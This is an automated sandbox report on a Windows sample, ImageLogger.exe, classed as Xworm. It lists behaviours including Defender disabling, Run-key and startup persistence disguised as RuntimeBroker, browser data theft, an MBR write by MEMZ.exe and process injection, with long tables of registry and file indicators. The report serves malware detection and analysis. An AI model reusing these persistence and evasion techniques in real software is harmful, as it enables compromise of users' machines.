Analysis Overview
SHA256
5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba
Threat Level: Known bad
The file ImageLogger.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Xworm
Detect Xworm Payload
Xworm family
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Drops desktop.ini file(s)
Enumerates connected drives
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Uses Volume Shadow Copy service COM API
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Modifies registry class
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 16:47
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 16:47
Reported
2024-06-21 17:11
Platform
win10v2004-20240611-en
Max time kernel
749s
Max time network
760s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2080292272-204036150-2159171770-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\O: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SYSTEM32\MsiExec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\MEMZ.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1424 set thread context of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\dotnet\host\fxr\6.0.27\hostfxr.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Installer\MSI239F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI23EF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3238.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3277.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000000000000187f58750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634628102897978" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\497A7447E2AFEB24ABA9F5BC5DC4D53F | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A1A5B816FCD50AC5256C8FA1FB47CF92 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
